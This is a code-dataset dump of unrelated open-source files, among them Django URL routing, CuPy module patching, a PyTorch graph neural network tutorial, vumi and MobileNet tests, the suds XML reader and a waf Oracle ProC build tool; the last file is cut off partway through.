max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
corehq/apps/userreports/urls.py | dimagilg/commcare-hq | 471 | 12634321 | <reponame>dimagilg/commcare-hq
from django.conf.urls import include, url
from corehq.apps.userreports.reports.view import (
DownloadUCRStatusView,
ucr_download_job_poll,
)
from corehq.apps.userreports.views import (
CreateConfigReportView,
CreateDataSourceFromAppView,
CreateDataSourceView,
DataSourceDebuggerView,
DataSourceSummaryView,
EditConfigReportView,
EditDataSourceView,
ExpressionDebuggerView,
ImportConfigReportView,
PreviewDataSourceView,
UserConfigReportsHomeView,
build_data_source_in_place,
copy_report,
choice_list_api,
data_source_json,
delete_data_source,
delete_report,
evaluate_data_source,
evaluate_expression,
export_data_source,
rebuild_data_source,
report_source_json,
resume_building_data_source,
undelete_data_source,
undelete_report,
update_report_description,
)
urlpatterns = [
url(r'^$', UserConfigReportsHomeView.as_view(),
name=UserConfigReportsHomeView.urlname),
url(r'^reports/create/$', CreateConfigReportView.as_view(),
name=CreateConfigReportView.urlname),
url(r'^reports/import/$', ImportConfigReportView.as_view(),
name=ImportConfigReportView.urlname),
url(r'^reports/edit/(?P<report_id>[\w-]+)/$', EditConfigReportView.as_view(),
name=EditConfigReportView.urlname),
url(r'^reports/source/(?P<report_id>[\w-]+)/$', report_source_json, name='configurable_report_json'),
url(r'^reports/delete/(?P<report_id>[\w-]+)/$', delete_report, name='delete_configurable_report'),
url(r'^reports/undelete/(?P<report_id>[\w-]+)/$', undelete_report, name='undo_delete_configurable_report'),
url(r'^data_sources/create/$', CreateDataSourceView.as_view(),
name=CreateDataSourceView.urlname),
url(r'^data_sources/create_from_app/$', CreateDataSourceFromAppView.as_view(),
name=CreateDataSourceFromAppView.urlname),
url(r'^data_sources/edit/(?P<config_id>[\w-]+)/$', EditDataSourceView.as_view(),
name=EditDataSourceView.urlname),
url(r'^data_sources/source/(?P<config_id>[\w-]+)/$', data_source_json, name='configurable_data_source_json'),
url(r'^data_sources/delete/(?P<config_id>[\w-]+)/$', delete_data_source,
name='delete_configurable_data_source'),
url(r'^data_sources/undelete/(?P<config_id>[\w-]+)/$', undelete_data_source,
name='undo_delete_data_source'),
url(r'^data_sources/rebuild/(?P<config_id>[\w-]+)/$', rebuild_data_source,
name='rebuild_configurable_data_source'),
url(r'^data_sources/resume/(?P<config_id>[\w-]+)/$', resume_building_data_source,
name='resume_build'),
url(r'^data_sources/build_in_place/(?P<config_id>[\w-]+)/$', build_data_source_in_place,
name='build_in_place'),
url(r'^data_sources/preview/(?P<config_id>[\w-]+)/$',
PreviewDataSourceView.as_view(),
name=PreviewDataSourceView.urlname),
url(r'^data_sources/summary/(?P<config_id>[\w-]+)/$',
DataSourceSummaryView.as_view(),
name=DataSourceSummaryView.urlname),
url(r'^data_sources/export/(?P<config_id>[\w-]+)/$', export_data_source,
name='export_configurable_data_source'),
url(r'^expression_debugger/$', ExpressionDebuggerView.as_view(),
name='expression_debugger'),
url(r'^data_source_debugger/$', DataSourceDebuggerView.as_view(),
name='data_source_debugger'),
url(r'^export_status/(?P<download_id>(?:dl-)?[0-9a-fA-Z]{25,32})/(?P<subreport_slug>[\w-]+)/$',
DownloadUCRStatusView.as_view(), name=DownloadUCRStatusView.urlname),
url(r'^export_job_poll/(?P<download_id>(?:dl-)?[0-9a-fA-Z]{25,32})/$',
ucr_download_job_poll, name='ucr_download_job_poll'),
# Update Report Description
url(r'^builder/update_report_description/(?P<report_id>[\w-]+)', update_report_description,
name='update_report_description'),
# apis
url(r'^api/choice_list/(?P<report_id>[\w-]+)/(?P<filter_id>[\w-]+)/$',
choice_list_api, name='choice_list_api'),
url(r'^expression_evaluator/$', evaluate_expression, name='expression_evaluator'),
url(r'^data_source_evaluator/$', evaluate_data_source, name='data_source_evaluator'),
url(r'^aggregate/', include('corehq.apps.aggregate_ucrs.urls')),
url(r'^copy_report/$', copy_report, name='copy_report'),
]
|
sporco/cupy/pgm/__init__.py | vishalbelsare/sporco | 217 | 12634355 | <reponame>vishalbelsare/sporco
# -*- coding: utf-8 -*-
# Copyright (C) 2018-2020 by <NAME> <<EMAIL>>
# All rights reserved. BSD 3-clause License.
# This file is part of the SPORCO package. Details of the copyright
# and user license can be found in the 'LICENSE.txt' file distributed
# with the package.
"""Construct variant of pgm subpackage that use cupy instead of numpy."""
from __future__ import absolute_import
import sys
import re
from sporco.cupy import sporco_cupy_patch_module
from sporco.cupy import common
from sporco.cupy import linalg
from sporco.cupy import fft
from sporco.cupy import prox
from sporco.cupy import cnvrep
# Construct sporco.cupy.pgm
pgm = sporco_cupy_patch_module('sporco.pgm')
# Construct cupy versions of sporco.pgm auxiliary modules
pgm.backtrack = sporco_cupy_patch_module('sporco.pgm.backtrack')
pgm.momentum = sporco_cupy_patch_module('sporco.pgm.momentum')
pgm.stepsize = sporco_cupy_patch_module('sporco.pgm.stepsize')
# Construct sporco.cupy.pgm.pgm
pgm.pgm = sporco_cupy_patch_module(
'sporco.pgm.pgm',
{'IterativeSolver': common.IterativeSolver,
'rfftn': fft.rfftn, 'irfftn': fft.irfftn,
'BacktrackStandard': pgm.backtrack.BacktrackStandard,
'BacktrackRobust': pgm.backtrack.BacktrackRobust,
'MomentumNesterov': pgm.momentum.MomentumNesterov,
'MomentumLinear': pgm.momentum.MomentumLinear,
'MomentumGenLinear': pgm.momentum.MomentumGenLinear,
'StepSizePolicyCauchy': pgm.stepsize.StepSizePolicyCauchy,
'StepSizePolicyBB': pgm.stepsize.StepSizePolicyBB})
# Record current entries in sys.modules and then replace them with
# patched versions of the modules
sysmod = {}
for mod in ('sporco.common', 'sporco.pgm', 'sporco.pgm.pgm'):
if mod in sys.modules:
sysmod[mod] = sys.modules[mod]
sys.modules['sporco.common'] = common
sys.modules['sporco.pgm'] = pgm
sys.modules['sporco.pgm.pgm'] = pgm.pgm
# Construct sporco.cupy.pgm.cbpdn
pgm.cbpdn = sporco_cupy_patch_module(
'sporco.pgm.cbpdn',
{'pgm': pgm.pgm, 'inner': linalg.inner,
'CSC_ConvRepIndexing': cnvrep.CSC_ConvRepIndexing,
'mskWshape': cnvrep.mskWshape, 'rfftn': fft.rfftn,
'irfftn': fft.irfftn, 'empty_aligned': fft.empty_aligned,
'rfftn_empty_aligned': fft.rfftn_empty_aligned,
'rfl2norm2': fft.rfl2norm2, 'prox_l1': prox.prox_l1})
# Restore original entries in sys.modules
for mod in ('sporco.common', 'sporco.pgm', 'sporco.pgm.pgm'):
if mod in sysmod:
sys.modules[mod] = sysmod[mod]
else:
del sys.modules[mod]
# In sporco.cupy.pgm module, replace original module source path with
# corresponding path in 'sporco/cupy' directory tree
for n, pth in enumerate(sys.modules['sporco.cupy.pgm'].__path__):
pth = re.sub('sporco/', 'sporco/cupy/', pth)
sys.modules['sporco.cupy.pgm'].__path__[n] = pth
|
tools/please_pex/pex_import_test.py | samwestmoreland/please | 1,992 | 12634379 | # Test for importing certain modules with the new incremental pex
# rules. These have proven tricky, seemingly around requests doing
# "from . import utils" etc (which is perfectly fine, and was working
# previously, this just helps investigate & make sure it's fixed).
import unittest
class PexImportTest(unittest.TestCase):
def test_import_requests(self):
"""Test importing Requests."""
from third_party.python import requests
def test_import_dateutil(self):
"""Test importing dateutil."""
from third_party.python.dateutil import parser
if __name__ == '__main__':
unittest.main()
|
ch18/ch18_part1.py | ericgarza70/machine-learning-book | 655 | 12634414 | # coding: utf-8
import sys
from python_environment_check import check_packages
import networkx as nx
import numpy as np
import torch
from torch.nn.parameter import Parameter
import torch.nn.functional as F
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
# # Machine Learning with PyTorch and Scikit-Learn
# # -- Code Examples
# ## Package version checks
# Add folder to path in order to load from the check_packages.py script:
sys.path.insert(0, '..')
# Check recommended package versions:
d = {
'torch': '1.8.0',
'networkx': '2.6.2',
'numpy': '1.21.2',
}
check_packages(d)
# # Chapter 18 - Graph Neural Networks for Capturing Dependencies in Graph Structured Data (Part 1/2)
# - [Introduction to graph data](#Introduction-to-graph-data)
# - [Undirected graphs](#Undirected-graphs)
# - [Directed graphs](#Directed-graphs)
# - [Labeled graphs](#Labeled-graphs)
# - [Representing molecules as graphs](#Representing-molecules-as-graphs)
# - [Understanding graph convolutions](#Understanding-graph-convolutions)
# - [The motivation behind using graph convolutions](#The-motivation-behind-using-graph-convolutions)
# - [Implementing a basic graph convolution](#Implementing-a-basic-graph-convolution)
# - [Implementing a GNN in PyTorch from scratch](#Implementing-a-GNN-in-PyTorch-from-scratch)
# - [Defining the NodeNetwork model](#Defining-the-NodeNetwork-model)
# - [Coding the NodeNetwork’s graph convolution layer](#Coding-the-NodeNetworks-graph-convolution-layer)
# - [Adding a global pooling layer to deal with varying graph sizes](#Adding-a-global-pooling-layer-to-deal-with-varying-graph-sizes)
# - [Preparing the DataLoader](#Preparing-the-DataLoader)
# - [Using the NodeNetwork to make predictions](#Using-the-NodeNetwork-to-make-predictions)
# ## Introduction to graph data
# ### Undirected graphs
# ### Directed graphs
# ### Labeled graphs
# ### Representing molecules as graphs
# ### Understanding graph convolutions
# ### The motivation behind using graph convolutions
# ### Implementing a basic graph convolution
G = nx.Graph()
#Hex codes for colors if we draw graph
blue, orange, green = "#1f77b4", "#ff7f0e","#2ca02c"
G.add_nodes_from([(1, {"color": blue}),
(2, {"color": orange}),
(3, {"color": blue}),
(4, {"color": green})])
G.add_edges_from([(1, 2),(2, 3),(1, 3),(3, 4)])
A = np.asarray(nx.adjacency_matrix(G).todense())
print(A)
def build_graph_color_label_representation(G,mapping_dict):
one_hot_idxs = np.array([mapping_dict[v] for v in
nx.get_node_attributes(G, 'color').values()])
one_hot_encoding = np.zeros((one_hot_idxs.size,len(mapping_dict)))
one_hot_encoding[np.arange(one_hot_idxs.size),one_hot_idxs] = 1
return one_hot_encoding
X = build_graph_color_label_representation(G, {green: 0, blue: 1, orange: 2})
print(X)
color_map = nx.get_node_attributes(G, 'color').values()
nx.draw(G, with_labels=True, node_color=color_map)
f_in, f_out = X.shape[1], 6
W_1 = np.random.rand(f_in, f_out)
W_2 = np.random.rand(f_in, f_out)
h = np.dot(X,W_1) + np.dot(np.dot(A, X), W_2)
# ## Implementing a GNN in PyTorch from scratch
# ### Defining the NodeNetwork model
class NodeNetwork(torch.nn.Module):
def __init__(self, input_features):
super().__init__()
self.conv_1 = BasicGraphConvolutionLayer(input_features, 32)
self.conv_2 = BasicGraphConvolutionLayer(32, 32)
self.fc_1 = torch.nn.Linear(32, 16)
self.out_layer = torch.nn.Linear(16, 2)
def forward(self, X, A,batch_mat):
x = self.conv_1(X, A).clamp(0)
x = self.conv_2(x, A).clamp(0)
output = global_sum_pool(x, batch_mat)
output = self.fc_1(output)
output = self.out_layer(output)
return F.softmax(output, dim=1)
# ### Coding the NodeNetwork’s graph convolution layer
class BasicGraphConvolutionLayer(torch.nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.W2 = Parameter(torch.rand(
(in_channels, out_channels), dtype=torch.float32))
self.W1 = Parameter(torch.rand(
(in_channels, out_channels), dtype=torch.float32))
self.bias = Parameter(torch.zeros(
out_channels, dtype=torch.float32))
def forward(self, X, A):
potential_msgs = torch.mm(X, self.W2)
propagated_msgs = torch.mm(A, potential_msgs)
root_update = torch.mm(X, self.W1)
output = propagated_msgs + root_update + self.bias
return output
# ### Adding a global pooling layer to deal with varying graph sizes
def global_sum_pool(X, batch_mat):
if batch_mat is None or batch_mat.dim() == 1:
return torch.sum(X, dim=0).unsqueeze(0)
else:
return torch.mm(batch_mat, X)
def get_batch_tensor(graph_sizes):
starts = [sum(graph_sizes[:idx]) for idx in range(len(graph_sizes))]
stops = [starts[idx]+graph_sizes[idx] for idx in range(len(graph_sizes))]
tot_len = sum(graph_sizes)
batch_size = len(graph_sizes)
batch_mat = torch.zeros([batch_size, tot_len]).float()
for idx, starts_and_stops in enumerate(zip(starts, stops)):
start = starts_and_stops[0]
stop = starts_and_stops[1]
batch_mat[idx, start:stop] = 1
return batch_mat
def collate_graphs(batch):
adj_mats = [graph['A'] for graph in batch]
sizes = [A.size(0) for A in adj_mats]
tot_size = sum(sizes)
# create batch matrix
batch_mat = get_batch_tensor(sizes)
# combine feature matrices
feat_mats = torch.cat([graph['X'] for graph in batch],dim=0)
# combine labels
labels = torch.cat([graph['y'] for graph in batch], dim=0)
# combine adjacency matrices
batch_adj = torch.zeros([tot_size, tot_size], dtype=torch.float32)
accum = 0
for adj in adj_mats:
g_size = adj.shape[0]
batch_adj[accum:accum+g_size, accum:accum+g_size] = adj
accum = accum + g_size
repr_and_label = {
'A': batch_adj,
'X': feat_mats,
'y': labels,
'batch' : batch_mat}
return repr_and_label
# ### Preparing the DataLoader
def get_graph_dict(G, mapping_dict):
# build dictionary representation of graph G
A = torch.from_numpy(np.asarray(nx.adjacency_matrix(G).todense())).float()
# build_graph_color_label_representation() was introduced with the first example graph
X = torch.from_numpy(build_graph_color_label_representation(G,mapping_dict)).float()
# kludge since there is not specific task for this example
y = torch.tensor([[1, 0]]).float()
return {'A': A, 'X': X, 'y': y, 'batch': None}
# building 4 graphs to treat as a dataset
blue, orange, green = "#1f77b4", "#ff7f0e","#2ca02c"
mapping_dict = {green: 0, blue: 1, orange: 2}
G1 = nx.Graph()
G1.add_nodes_from([(1, {"color": blue}),
(2, {"color": orange}),
(3, {"color": blue}),
(4, {"color": green})])
G1.add_edges_from([(1, 2), (2, 3),(1, 3), (3, 4)])
G2 = nx.Graph()
G2.add_nodes_from([(1, {"color": green}),
(2, {"color": green}),
(3, {"color": orange}),
(4, {"color": orange}),
(5,{"color": blue})])
G2.add_edges_from([(2, 3),(3, 4),(3, 1),(5, 1)])
G3 = nx.Graph()
G3.add_nodes_from([(1, {"color": orange}),
(2, {"color": orange}),
(3, {"color": green}),
(4, {"color": green}),
(5, {"color": blue}),
(6, {"color":orange})])
G3.add_edges_from([(2, 3), (3, 4), (3, 1), (5, 1), (2, 5), (6, 1)])
G4 = nx.Graph()
G4.add_nodes_from([(1, {"color": blue}), (2, {"color": blue}), (3, {"color": green})])
G4.add_edges_from([(1, 2), (2, 3)])
graph_list = [get_graph_dict(graph,mapping_dict) for graph in [G1, G2, G3, G4]]
class ExampleDataset(Dataset):
# Simple PyTorch dataset that will use our list of graphs
def __init__(self, graph_list):
self.graphs = graph_list
def __len__(self):
return len(self.graphs)
def __getitem__(self,idx):
mol_rep = self.graphs[idx]
return mol_rep
dset = ExampleDataset(graph_list)
# Note how we use our custom collate function
loader = DataLoader(dset, batch_size=2, shuffle=False, collate_fn=collate_graphs)
# ### Using the NodeNetwork to make predictions
torch.manual_seed(123)
node_features = 3
net = NodeNetwork(node_features)
batch_results = []
for b in loader:
batch_results.append(net(b['X'], b['A'], b['batch']).detach())
G1_rep = dset[1]
G1_single = net(G1_rep['X'], G1_rep['A'], G1_rep['batch']).detach()
G1_batch = batch_results[0][1]
torch.all(torch.isclose(G1_single, G1_batch))
# ---
#
# Readers may ignore the next cell.
|
voctocore/lib/errors/configuration_error.py | 0xflotus/voctomix | 521 | 12634422 | <filename>voctocore/lib/errors/configuration_error.py
class ConfigurationError(RuntimeError):
"""Problem in the Configuration"""
|
vumi/transports/tests/test_base.py | seidu626/vumi | 199 | 12634425 | <filename>vumi/transports/tests/test_base.py
from twisted.internet.defer import inlineCallbacks
from vumi.tests.helpers import VumiTestCase
from vumi.transports.base import Transport
from vumi.transports.tests.helpers import TransportHelper
from vumi.tests.utils import LogCatcher
class TestBaseTransport(VumiTestCase):
TEST_MIDDLEWARE_CONFIG = {
"middleware": [
{"mw1": "vumi.middleware.tests.utils.RecordingMiddleware"},
{"mw2": "vumi.middleware.tests.utils.RecordingMiddleware"},
],
}
def setUp(self):
self.tx_helper = self.add_helper(TransportHelper(Transport))
@inlineCallbacks
def test_start_transport(self):
tr = yield self.tx_helper.get_transport({})
self.assertEqual(self.tx_helper.transport_name, tr.transport_name)
self.assertTrue(len(tr.connectors) >= 1)
connector = tr.connectors[tr.transport_name]
self.assertTrue(connector._consumers.keys(), set(['outbound']))
self.assertTrue(connector._publishers.keys(),
set(['inbound', 'event']))
self.assertEqual(tr.failure_publisher.routing_key,
'%s.failures' % (tr.transport_name,))
@inlineCallbacks
def test_middleware_for_inbound_messages(self):
transport = yield self.tx_helper.get_transport(
self.TEST_MIDDLEWARE_CONFIG)
orig_msg = self.tx_helper.make_inbound("inbound")
yield transport.publish_message(**orig_msg.payload)
[msg] = self.tx_helper.get_dispatched_inbound()
self.assertEqual(msg['record'], [
['mw2', 'inbound', self.tx_helper.transport_name],
['mw1', 'inbound', self.tx_helper.transport_name],
])
@inlineCallbacks
def test_middleware_for_events(self):
transport = yield self.tx_helper.get_transport(
self.TEST_MIDDLEWARE_CONFIG)
orig_msg = self.tx_helper.make_ack()
yield transport.publish_event(**orig_msg.payload)
[msg] = self.tx_helper.get_dispatched_events()
self.assertEqual(msg['record'], [
['mw2', 'event', self.tx_helper.transport_name],
['mw1', 'event', self.tx_helper.transport_name],
])
@inlineCallbacks
def test_middleware_for_failures(self):
transport = yield self.tx_helper.get_transport(
self.TEST_MIDDLEWARE_CONFIG)
orig_msg = self.tx_helper.make_outbound("outbound")
yield transport.send_failure(orig_msg, ValueError(), "dummy_traceback")
[msg] = self.tx_helper.get_dispatched_failures()
self.assertEqual(msg['record'], [
['mw2', 'failure', self.tx_helper.transport_name],
['mw1', 'failure', self.tx_helper.transport_name],
])
@inlineCallbacks
def test_middleware_for_outbound_messages(self):
msgs = []
transport = yield self.tx_helper.get_transport(
self.TEST_MIDDLEWARE_CONFIG)
transport.add_outbound_handler(msgs.append)
yield self.tx_helper.make_dispatch_outbound("outbound")
[msg] = msgs
self.assertEqual(msg['record'], [
('mw1', 'outbound', self.tx_helper.transport_name),
('mw2', 'outbound', self.tx_helper.transport_name),
])
def get_tx_consumers(self, tx):
for connector in tx.connectors.values():
for consumer in connector._consumers.values():
yield consumer
@inlineCallbacks
def test_transport_prefetch_count_custom(self):
transport = yield self.tx_helper.get_transport({
'amqp_prefetch_count': 1,
})
consumers = list(self.get_tx_consumers(transport))
self.assertEqual(1, len(consumers))
for consumer in consumers:
fake_channel = consumer.channel._fake_channel
self.assertEqual(fake_channel.qos_prefetch_count, 1)
@inlineCallbacks
def test_transport_prefetch_count_default(self):
transport = yield self.tx_helper.get_transport({})
consumers = list(self.get_tx_consumers(transport))
self.assertEqual(1, len(consumers))
for consumer in consumers:
fake_channel = consumer.channel._fake_channel
self.assertEqual(fake_channel.qos_prefetch_count, 20)
@inlineCallbacks
def test_add_outbound_handler(self):
transport = yield self.tx_helper.get_transport({})
msgs = []
msg = transport.add_outbound_handler(msgs.append, endpoint_name='foo')
msg = yield self.tx_helper.make_dispatch_outbound(
"outbound", endpoint='foo')
self.assertEqual(msgs, [msg])
@inlineCallbacks
def test_publish_status(self):
transport = yield self.tx_helper.get_transport({
'transport_name': 'foo',
'publish_status': True
})
msg = yield transport.publish_status(
status='down',
component='foo',
type='bar',
message='baz')
self.assertEqual(msg['status'], 'down')
self.assertEqual(msg['component'], 'foo')
self.assertEqual(msg['type'], 'bar')
self.assertEqual(msg['message'], 'baz')
msgs = self.tx_helper.get_dispatched_statuses('foo.status')
self.assertEqual(msgs, [msg])
@inlineCallbacks
def test_publish_status_disabled(self):
transport = yield self.tx_helper.get_transport({
'transport_name': 'foo',
'worker_name': 'foo',
'publish_status': False
})
with LogCatcher() as lc:
msg = yield transport.publish_status(
status='down',
component='foo',
type='bar',
message='baz')
self.assertEqual(msg['status'], 'down')
self.assertEqual(msg['component'], 'foo')
self.assertEqual(msg['type'], 'bar')
self.assertEqual(msg['message'], 'baz')
msgs = self.tx_helper.get_dispatched_statuses('foo.status')
self.assertEqual(msgs, [])
[log] = lc.logs
self.assertEqual(
log['message'][0],
"Status publishing disabled for transport 'foo', "
"ignoring status %r" % (msg,))
self.assertEqual(log['system'], 'foo')
|
suds/reader.py | Ndn1618/interactive-tutorials | 2,750 | 12634462 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: <NAME> ( <EMAIL> )
"""
Contains xml document reader classes.
"""
import hashlib
from logging import getLogger
from suds.sax.parser import Parser
from suds.transport import Request
from suds.cache import NoCache
from suds.store import DocumentStore
from suds.plugin import PluginContainer
log = getLogger(__name__)
class Reader:
"""
The reader provides integration with cache.
@ivar options: An options object.
@type options: I{Options}
"""
def __init__(self, options):
"""
@param options: An options object.
@type options: I{Options}
"""
self.options = options
self.plugins = PluginContainer(options.plugins)
def mangle(self, name, x):
"""
Mangle the name by hashing the I{name} and appending I{x}.
@return: the mangled name.
"""
h = hashlib.sha256(name.encode('utf8')).hexdigest()
return '%s-%s' % (h, x)
class DocumentReader(Reader):
"""
The XML document reader provides an integration
between the SAX L{Parser} and the document cache.
"""
def open(self, url):
"""
Open an XML document at the specified I{url}.
First, the document attempted to be retrieved from
the I{object cache}. If not found, it is downloaded and
parsed using the SAX parser. The result is added to the
cache for the next open().
@param url: A document url.
@type url: str.
@return: The specified XML document.
@rtype: I{Document}
"""
cache = self.cache()
id = self.mangle(url, 'document')
d = cache.get(id)
if d is None:
d = self.download(url)
cache.put(id, d)
self.plugins.document.parsed(url=url, document=d.root())
return d
def download(self, url):
"""
Download the docuemnt.
@param url: A document url.
@type url: str.
@return: A file pointer to the docuemnt.
@rtype: file-like
"""
store = DocumentStore()
fp = store.open(url)
if fp is None:
fp = self.options.transport.open(Request(url))
content = fp.read()
fp.close()
ctx = self.plugins.document.loaded(url=url, document=content)
content = ctx.document
sax = Parser()
return sax.parse(string=content)
def cache(self):
"""
Get the cache.
@return: The I{options} when I{cachingpolicy} = B{0}.
@rtype: L{Cache}
"""
if self.options.cachingpolicy == 0:
return self.options.cache
else:
return NoCache()
class DefinitionsReader(Reader):
"""
The WSDL definitions reader provides an integration
between the Definitions and the object cache.
@ivar fn: A factory function (constructor) used to
create the object not found in the cache.
@type fn: I{Constructor}
"""
def __init__(self, options, fn):
"""
@param options: An options object.
@type options: I{Options}
@param fn: A factory function (constructor) used to
create the object not found in the cache.
@type fn: I{Constructor}
"""
Reader.__init__(self, options)
self.fn = fn
def open(self, url):
"""
Open a WSDL at the specified I{url}.
First, the WSDL attempted to be retrieved from
the I{object cache}. After unpickled from the cache, the
I{options} attribute is restored.
If not found, it is downloaded and instantiated using the
I{fn} constructor and added to the cache for the next open().
@param url: A WSDL url.
@type url: str.
@return: The WSDL object.
@rtype: I{Definitions}
"""
cache = self.cache()
id = self.mangle(url, 'wsdl')
d = cache.get(id)
if d is None:
d = self.fn(url, self.options)
cache.put(id, d)
else:
d.options = self.options
for imp in d.imports:
imp.imported.options = self.options
return d
def cache(self):
"""
Get the cache.
@return: The I{options} when I{cachingpolicy} = B{1}.
@rtype: L{Cache}
"""
if self.options.cachingpolicy == 1:
return self.options.cache
else:
return NoCache()
|
tools/nets/mobilenet_test.py | wqdun/MobileNet | 1,698 | 12634473 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MobileNet."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from nets import mobilenet
slim = tf.contrib.slim
class MobileNetTest(tf.test.TestCase):
def testBuild(self):
batch_size = 5
height, width = 224, 224
num_classes = 1000
with self.test_session():
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, end_points = mobilenet.mobilenet(inputs, num_classes)
self.assertEquals(end_points['MobileNet/conv_ds_2/depthwise_conv'].get_shape().as_list(), [5, 112, 112, 32])
self.assertEquals(end_points['MobileNet/conv_ds_3/depthwise_conv'].get_shape().as_list(), [5, 56, 56, 64])
self.assertEquals(end_points['MobileNet/conv_ds_4/depthwise_conv'].get_shape().as_list(), [5, 56, 56, 128])
self.assertEquals(end_points['MobileNet/conv_ds_5/depthwise_conv'].get_shape().as_list(), [5, 28, 28, 128])
self.assertEquals(end_points['MobileNet/conv_ds_6/depthwise_conv'].get_shape().as_list(), [5, 28, 28, 256])
self.assertEquals(end_points['MobileNet/conv_ds_7/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 256])
self.assertEquals(end_points['MobileNet/conv_ds_8/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_9/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_10/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_11/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_12/depthwise_conv'].get_shape().as_list(), [5, 14, 14, 512])
self.assertEquals(end_points['MobileNet/conv_ds_13/depthwise_conv'].get_shape().as_list(), [5, 7, 7, 512])
self.assertEquals(end_points['MobileNet/conv_ds_14/depthwise_conv'].get_shape().as_list(), [5, 7, 7, 1024])
self.assertEquals(end_points['squeeze'].get_shape().as_list(), [5, 1024])
self.assertEquals(logits.op.name, 'MobileNet/fc_16/BiasAdd')
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
def testEvaluation(self):
batch_size = 2
height, width = 224, 224
num_classes = 1000
with self.test_session():
eval_inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = mobilenet.mobilenet(eval_inputs, is_training=False)
self.assertListEqual(logits.get_shape().as_list(),
[batch_size, num_classes])
predictions = tf.argmax(logits, 1)
self.assertListEqual(predictions.get_shape().as_list(), [batch_size])
def testForward(self):
batch_size = 1
height, width = 224, 224
with self.test_session() as sess:
inputs = tf.random_uniform((batch_size, height, width, 3))
logits, _ = mobilenet.mobilenet(inputs)
sess.run(tf.global_variables_initializer())
output = sess.run(logits)
self.assertTrue(output.any())
if __name__ == '__main__':
tf.test.main()
|
lib-src/lv2/suil/waflib/extras/proc.py | joshrose/audacity | 7,892 | 12634580 | #! /usr/bin/env python
# per rosengren 2011
from os import environ, path
from waflib import TaskGen, Utils
def options(opt):
grp = opt.add_option_group('Oracle ProC Options')
grp.add_option('--oracle_home', action='store', default=environ.get('PROC_ORACLE'), help='Path to Oracle installation home (has bin/lib)')
grp.add_option('--tns_admin', action='store', default=environ.get('TNS_ADMIN'), help='Directory containing server list (TNS_NAMES.ORA)')
grp.add_option('--connection', action='store', default='dummy-user/dummy-password@dummy-server', help='Format: user/password@server')
def configure(cnf):
env = cnf.env
if not env.PROC_ORACLE:
env.PROC_ORACLE = cnf.options.oracle_home
if not env.PROC_TNS_ADMIN:
env.PROC_TNS_ADMIN = cnf.options.tns_admin
if not env.PROC_CONNECTION:
env.PROC_CONNECTION = cnf.options.connection
cnf.find_program('proc', var='PROC', path_list=env.PROC_ORACLE + path.sep + 'bin')
def proc(tsk):
env = tsk.env
gen = tsk.generator
inc_nodes = gen.to_incnodes(Utils.to_list(getattr(gen,'includes',[])) + env['INCLUDES'])
cmd = (
[env.PROC] +
['SQLCHECK=SEMANTICS'] +
(['SYS_INCLUDE=(' + ','.join(env.PROC_INCLUDES) + ')']
if env.PROC_INCLUDES else []) +
['INCLUDE=(' + ','.join(
[i.bldpath() for i in inc_nodes]
) + ')'] +
['userid=' + env.PROC_CONNECTION] +
['INAME=' + tsk.inputs[0].bldpath()] +
['ONAME=' + tsk.outputs[0].bldpath()]
)
exec_env = {
'ORACLE_HOME': env.PROC_ORACLE,
'LD_LIBRARY_PATH': env.PROC_ORACLE + path.sep + 'lib',
}
if env.PROC_TNS_ADMIN:
exec_env['TNS_ADMIN'] = env.PROC_TNS_ADMIN
return tsk.exec_command(cmd, env=exec_env)
TaskGen.declare_chain(
name = 'proc',
rule = proc,
ext_in = '.pc',
ext_out = '.c',
)
|
descarteslabs/common/tasks/exporttask.py | carderne/descarteslabs-python | 167 | 12634608 | import time
from descarteslabs.client.exceptions import NotFoundError
from descarteslabs.client.services.storage import Storage
from descarteslabs.common.tasks import FutureTask, TransientResultError, TimeoutError
class ExportTask(FutureTask):
"""
An export task. Accessing any attributes before the task is completed
(for example :attr:`status`) will block until the task completes.
If you want to check whether the attributes are available, use
:attr:`is_ready` which will return :const:`True` when attributes are available.
Do not create an :class:`ExportTask` yourself; it is returned by
:meth:`FeatureCollection.export
<descarteslabs.vectors.featurecollection.FeatureCollection.export>`
and :meth:`FeatureCollection.list_exports
<descarteslabs.vectors.featurecollection.FeatureCollection.list_exports>`.
"""
def __init__(self, guid, tuid=None, client=None, result_attrs=None, key=None):
if client is None:
from descarteslabs.client.services.vector import Vector # circular import
client = Vector()
super(ExportTask, self).__init__(guid, tuid, client=client)
self.export_id = tuid
self._task_result = result_attrs
self._set_key(key)
def _set_key(self, key):
if key is not None:
self.key = key
